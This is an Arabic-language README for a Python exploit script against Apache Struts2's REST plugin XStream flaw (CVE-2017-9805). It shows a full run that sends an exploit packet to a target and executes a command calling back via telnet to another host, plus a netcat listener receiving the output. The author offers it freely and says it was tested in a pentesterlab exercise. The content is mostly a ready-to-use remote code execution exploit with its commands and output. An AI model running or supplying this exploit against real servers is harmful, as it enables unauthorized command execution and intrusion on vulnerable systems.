
نص استغلال لـ Apache Struts2 REST Plugin XStream RCE (CVE-2017-9805)
المصادر: * https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9805
نص برمجي بايثون لاستغلال الثغرات قادر على تنفيذ أوامر عن بعد في واجهة النظام الذي يستضيف Struts2 المعرض لـ S2-052.
╭─root@blackshell ~/
╰─# python s2-052.py --target 'http://192.168.0.233/orders/3' --command "echo pwned | telnet 192.168.0.122 1234"
[*] Apache Struts XStream REST vulnerability - S2-052
[*] Creating payload ...
[*] Exploit packet has 2582 bytes.
[*] Sending exploit packet ...
[+] Exploit packet has been sent.
╭─zc00l@blackshell ~/
╰─$ nc -lvp 1234
listening on [any] 1234 ...
connect to [192.168.0.122] from vulnerable.lan [192.168.0.233] 55791
pwned
تم اختباره على آلة pentesterlab المعرضة للخطر في التمرين s2-052.
تمت كتابة هذا النص البرمجي للاستغلال من قبلي (zc00l) ويمكن لأي شخص استخدامه.
في حال رغبت في استخدام أو تعديل هذا النص البرمجي، يرجى منح الإسناد المناسب لأي عمل تم إنجازه بالفعل.